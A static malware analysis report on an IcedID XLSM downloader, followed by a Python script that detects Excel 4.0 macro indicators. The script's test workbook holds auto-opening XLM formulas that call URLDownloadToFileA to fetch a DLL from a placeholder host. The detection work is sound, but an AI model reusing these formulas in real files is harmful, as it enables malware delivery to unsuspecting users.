IcedID — Office (OOXML) / .XLSM malware analysis

Static analysis result for SHA-256 edac2184bd24dac2…

MALICIOUS

Office (OOXML) / .XLSM

Size: 329.9 KB
Created: 2015-06-05 18:19:34 UTC (document-supplied metadata from docProps/core.xml; attacker-controlled, so not evidence of when the lure was built)
Authoring application: Microsoft Excel 16.0300 (also document-supplied)
MD5: 3d2063691d4b135494f57e9dc99ea05a
SHA-1: d7a94b522e612dd3f28942b41bc93131487688b7
SHA-256: edac2184bd24dac22d0b946b555af58009496b4bc1ef6367799f15b12312cd21
Risk Score: 250

Malware Insights

IcedID · confidence 95%

MITRE ATT&CK
T1204.002 User Execution: Malicious File
T1059.001 Command and Scripting Interpreter: PowerShell
T1059.003 Command and Scripting Interpreter: Windows Command Shell
T1059.005 Command and Scripting Interpreter: Visual Basic

The sample is an XLSM workbook containing Excel 4.0 (XLM) macro sheets, as indicated by multiple critical heuristic firings: ten XLM macro sheets, ten hidden sheets, an Auto_Open defined name, and use of the FORMULA, GOTO, REGISTER and HALT functions. REGISTER imports an export from a Win32 DLL so the sheet can call it, and FORMULA writes new formula text into cells at run time; together they are well-known primitives for assembling a download-and-execute chain without touching VBA. The ClamAV signature classifies the file as an IcedID downloader. No document body text was available for analysis, but the macro capabilities and the AV signature together support a malicious download-and-execute verdict.

Heuristics (6)

  • Excel 4.0 macro sheet (10 sheet(s)) critical OOXML_XLM_MACROSHEET
    Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks.
  • Excel 4.0 Auto_Open defined name critical OOXML_XLM_AUTOOPEN_DEFINEDNAME
    Workbook defines _xlnm.Auto_Open or _xlnm.Auto_Close while containing an XLM macro sheet. This is the OOXML/XLSB auto-execution shape for Excel 4.0 macros.
  • Dangerous XLM formula APIs: FORMULA, GOTO, REGISTER, HALT critical OOXML_XLM_DANGEROUS_FN
    The Excel 4.0 macro sheet uses XLM functions that give a spreadsheet process-level capabilities without VBA. This rule covers CALL and REGISTER (import an export from an arbitrary Win32 DLL and invoke it as a sheet function), EXEC (start a process) and FORMULA (write formula text into another cell at run time, which lets the macro assemble its real code from staging cells only when it executes). GOTO and HALT are control flow; on their own they are benign, but they are evidence that the sheet is a program rather than data. In this sample the combination REGISTER + FORMULA is the classic shape for downloading a payload, writing it to disk and starting it from an XLM macro.
  • ClamAV: Xls.Downloader.IcedID-9f1f1d193a2a2a2b-9951463-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Downloader.IcedID-9f1f1d193a2a2a2b-9951463-0. The signature name classifies the document as an Excel-based downloader attributed to IcedID; family attribution from a document signature alone should be corroborated by the payload the macro actually fetches.
  • Hidden worksheet (hidden) low OOXML_HIDDEN_SHEET
    Excel workbook contains 10 hidden sheet(s). Hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction; here the count matches the ten XLM macro sheets above, consistent with the macro code being kept entirely out of the user's view. Note that Excel distinguishes "hidden" (unhidable from the UI) from "veryHidden" (only changeable through the object model or by editing the XML), and malware typically prefers the latter.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection: context-specific rules above attribute URLs they actually evaluated; this rule lists URLs that were present in the bytes but were not otherwise tied to a specific finding. Every URL below is a standard OOXML or Office XML namespace identifier that appears in any workbook saved by Excel; none is a network indicator, and no download URL was recovered from the static strings.
    • http://schemas.openxmlformats.org/spreadsheetml/2006/main
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships
    • http://schemas.openxmlformats.org/markup-compatibility/2006
    • http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac
    • http://schemas.microsoft.com/office/spreadsheetml/2014/revision
    • http://schemas.microsoft.com/office/spreadsheetml/2015/revision2
    • http://schemas.microsoft.com/office/spreadsheetml/2016/revision3
    • http://schemas.microsoft.com/office/excel/2006/main
    • http://schemas.microsoft.com/office/spreadsheetml/2016/revision6
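The four structural heuristics above (XLM macro sheet parts, the _xlnm.Auto_Open defined name, dangerous XLM functions, hidden sheets) are all cheap to check without opening the file in Excel. The following Python script is an added example, not code from this report or from the scanner that produced it; it reimplements those checks over an OOXML workbook with the standard library only. The workbook it inspects is constructed inline by build_sample_xlsm() and is not the IcedID sample; the DANGEROUS_FNS list and the is_suspicious() verdict are assumptions of this example. It goes slightly beyond the report in one respect: it resolves macro sheets through [Content_Types].xml as well as by path, because part names under xl/macrosheets/ are attacker-controlled while the declared content type is what Excel actually trusts.

```python
"""XLM (Excel 4.0) triage for OOXML workbooks. Added example, not code from the
report or the scanners it quotes; standard library only. The workbook it
inspects is built in build_sample_xlsm() and is not this page's sample."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

NS_MAIN = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
NS_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
NS_XM = "http://schemas.microsoft.com/office/excel/2006/main"
NS_CT = "http://schemas.openxmlformats.org/package/2006/content-types"
# Content types Excel assigns to regular and "international" macro sheets.
MACROSHEET_CTYPES = {"application/vnd.ms-excel.macrosheet+xml",
                     "application/vnd.ms-excel.intlmacrosheet+xml"}
# XLM functions worth flagging (DLL import/call, process start, run-time
# formula writing, file I/O, control flow). Assumed list; extend as needed.
DANGEROUS_FNS = {"CALL", "REGISTER", "EXEC", "FORMULA", "FORMULA.FILL", "RUN",
                 "GOTO", "HALT", "FOPEN", "FWRITE", "FCLOSE"}
FN_CALL_RE = re.compile(r"\b([A-Z][A-Z0-9.]*)\s*\(")


def triage_xlsm(data: bytes) -> dict:
    """Return the XLM indicators found in an OOXML workbook given as zip bytes."""
    out = {"macrosheets": set(), "auto_open": [], "hidden_sheets": [], "dangerous_fns": {}}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = set(z.namelist())
        # 1. Macro sheet parts: by path (sheetN.xml and intlsheetN.xml) and by
        #    declared content type, which is what Excel actually trusts; part
        #    names are attacker-controlled and can be renamed to dodge globs.
        out["macrosheets"] |= {n for n in names if n.startswith("xl/macrosheets/") and n.endswith(".xml")}
        if "[Content_Types].xml" in names:
            for ov in ET.fromstring(z.read("[Content_Types].xml")).iter(f"{{{NS_CT}}}Override"):
                if ov.get("ContentType") in MACROSHEET_CTYPES:
                    out["macrosheets"].add(ov.get("PartName", "").lstrip("/"))
        # 2. Auto-execution names and sheet visibility live in xl/workbook.xml.
        if "xl/workbook.xml" in names:
            wb = ET.fromstring(z.read("xl/workbook.xml"))
            for dn in wb.iter(f"{{{NS_MAIN}}}definedName"):
                if dn.get("name", "").lower() in ("_xlnm.auto_open", "_xlnm.auto_close"):
                    out["auto_open"].append((dn.get("name"), (dn.text or "").strip()))
            for sh in wb.iter(f"{{{NS_MAIN}}}sheet"):
                if sh.get("state", "visible") in ("hidden", "veryHidden"):
                    out["hidden_sheets"].append((sh.get("name"), sh.get("state")))
        # 3. Scan every formula (<f>) in each macro sheet for dangerous calls.
        for part in sorted(out["macrosheets"] & names):
            for f in ET.fromstring(z.read(part)).iter(f"{{{NS_MAIN}}}f"):
                hits = set(FN_CALL_RE.findall((f.text or "").upper())) & DANGEROUS_FNS
                if hits:
                    out["dangerous_fns"].setdefault(part, set()).update(hits)
    out["macrosheets"] = sorted(out["macrosheets"])
    out["dangerous_fns"] = {k: sorted(v) for k, v in out["dangerous_fns"].items()}
    return out


def is_suspicious(findings: dict) -> bool:
    """Report-style verdict: an XLM sheet that auto-runs or calls dangerous APIs."""
    return bool(findings["macrosheets"]) and bool(findings["auto_open"] or findings["dangerous_fns"])


def build_sample_xlsm(with_macro: bool = True) -> bytes:
    """Constructed minimal workbook (not the report's sample). With with_macro=True
    it adds a veryHidden international macro sheet wired to Auto_Open whose
    formulas mirror the REGISTER/FORMULA/GOTO/HALT pattern flagged above."""
    sheets, names, overrides = '<sheet name="Sheet1" sheetId="1" r:id="rId1"/>', "", ""
    parts = {"xl/worksheets/sheet1.xml": f'<worksheet xmlns="{NS_MAIN}"><sheetData/></worksheet>'}
    if with_macro:
        sheets += '<sheet name="Macro1" sheetId="2" state="veryHidden" r:id="rId2"/>'
        names = '<definedNames><definedName name="_xlnm.Auto_Open">Macro1!$A$1</definedName></definedNames>'
        overrides = ('<Override PartName="/xl/macrosheets/intlsheet1.xml" '
                     'ContentType="application/vnd.ms-excel.intlmacrosheet+xml"/>')
        # OOXML formula text omits the leading "="; URL and path are placeholders.
        rows = ['REGISTER("urlmon","URLDownloadToFileA","JJCCJJ","dl",,1,9)',
                'FORMULA("=dl(0,""http://example.invalid/p"",""C:\\Users\\Public\\p.dll"",0,0)",B1)',
                'GOTO(B1)', 'HALT()']
        cells = "".join(f'<row r="{i}"><c r="A{i}" t="str"><f>{r}</f><v>0</v></c></row>'
                        for i, r in enumerate(rows, 1))
        parts["xl/macrosheets/intlsheet1.xml"] = (
            f'<xm:macrosheet xmlns="{NS_MAIN}" xmlns:xm="{NS_XM}"><sheetData>{cells}</sheetData></xm:macrosheet>')
    parts["[Content_Types].xml"] = f'<Types xmlns="{NS_CT}">{overrides}</Types>'
    parts["xl/workbook.xml"] = (f'<workbook xmlns="{NS_MAIN}" xmlns:r="{NS_REL}">'
                                f'<sheets>{sheets}</sheets>{names}</workbook>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        for name, xml in parts.items():
            z.writestr(name, xml)
    return buf.getvalue()


if __name__ == "__main__":
    for label, blob in (("macro", build_sample_xlsm(True)), ("clean", build_sample_xlsm(False))):
        findings = triage_xlsm(blob)
        print(f"{label}: suspicious={is_suspicious(findings)} {findings}")
```

To run it against a real file, pass the bytes of the .xlsm to triage_xlsm(). The function-name scan is deliberately simple (a regex over the raw formula text) and will not see calls whose names are assembled at run time with FORMULA or CHAR()/MID() tricks; that is exactly why the presence of FORMULA itself is treated as a finding rather than only the names it writes.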

Extracted artifacts (10)

Files carved from inside the sample during analysis. Nine of the ten macro sheet parts are stored as xl/macrosheets/intlsheetN.xml, the part name Excel uses for international macro sheets (content type application/vnd.ms-excel.intlmacrosheet+xml); only one is a regular macro sheet (sheet1.xml). Tooling that enumerates only xl/macrosheets/sheet*.xml, or only the regular macro sheet content type, would miss most of this sample's code, so extraction should walk every part under xl/macrosheets/ or resolve parts by content type.

  • xlm_sheet_00.xml
    SHA-256: 080bf0d1913eabdbe68c9f55d92e797adb72f1bc1d886b19764eaaf321e40bcc
    Kind: xlm-macrosheet (OOXML XLM macro sheet)
    Source: xl/macrosheets/intlsheet1.xml
    Size: 3139 bytes
  • xlm_sheet_01.xml
    SHA-256: 05164b9cb70e0037b39b203885ebd44decd4d50bf6d78fd17a97030d1a30d169
    Kind: xlm-macrosheet (OOXML XLM macro sheet)
    Source: xl/macrosheets/intlsheet2.xml
    Size: 1775 bytes
  • xlm_sheet_02.xml
    SHA-256: 57964786069256c3cde5b674c74c83e32c7950a5a81fb86406607b9295962e79
    Kind: xlm-macrosheet (OOXML XLM macro sheet)
    Source: xl/macrosheets/intlsheet3.xml
    Size: 2200 bytes
  • xlm_sheet_03.xml
    SHA-256: 8e54ca9c8231ff6eeb2f34ba5a3783f05811c03293e81c3321c593743fc7d49b
    Kind: xlm-macrosheet (OOXML XLM macro sheet)
    Source: xl/macrosheets/intlsheet4.xml
    Size: 1453 bytes
  • xlm_sheet_04.xml
    SHA-256: bc63d00a02951125a391dfed946345cbbd3e47d5e732e1f67ca4c1232e853427
    Kind: xlm-macrosheet (OOXML XLM macro sheet)
    Source: xl/macrosheets/intlsheet5.xml
    Size: 1453 bytes
  • xlm_sheet_05.xml
    SHA-256: 1da17f060335fdb67c88a8c48e73de301d69d9af4b69c610a8ce665eeb86cad7
    Kind: xlm-macrosheet (OOXML XLM macro sheet)
    Source: xl/macrosheets/intlsheet6.xml
    Size: 1452 bytes
  • xlm_sheet_06.xml
    SHA-256: f6b4423280cd454553d841491284df3eff350a07bc739b9add3542ffb6a9432a
    Kind: xlm-macrosheet (OOXML XLM macro sheet)
    Source: xl/macrosheets/intlsheet7.xml
    Size: 1454 bytes
  • xlm_sheet_07.xml
    SHA-256: bdf4c4c111e091debcc20b38007edacf914de0a9b4c13576faa0148f2eae61a7
    Kind: xlm-macrosheet (OOXML XLM macro sheet)
    Source: xl/macrosheets/intlsheet8.xml
    Size: 1455 bytes
  • xlm_sheet_08.xml
    SHA-256: a6ea880b09fb36b15b9b86dc98d863447933c1968cf6c7d3bec7927472189efa
    Kind: xlm-macrosheet (OOXML XLM macro sheet)
    Source: xl/macrosheets/intlsheet9.xml
    Size: 1451 bytes
  • xlm_sheet_09.xml
    SHA-256: 6b415b149f32e6deb26c4b2856c7977501b27603cf485b4daf15fd4fee7940d5
    Kind: xlm-macrosheet (OOXML XLM macro sheet)
    Source: xl/macrosheets/sheet1.xml
    Size: 1496 bytes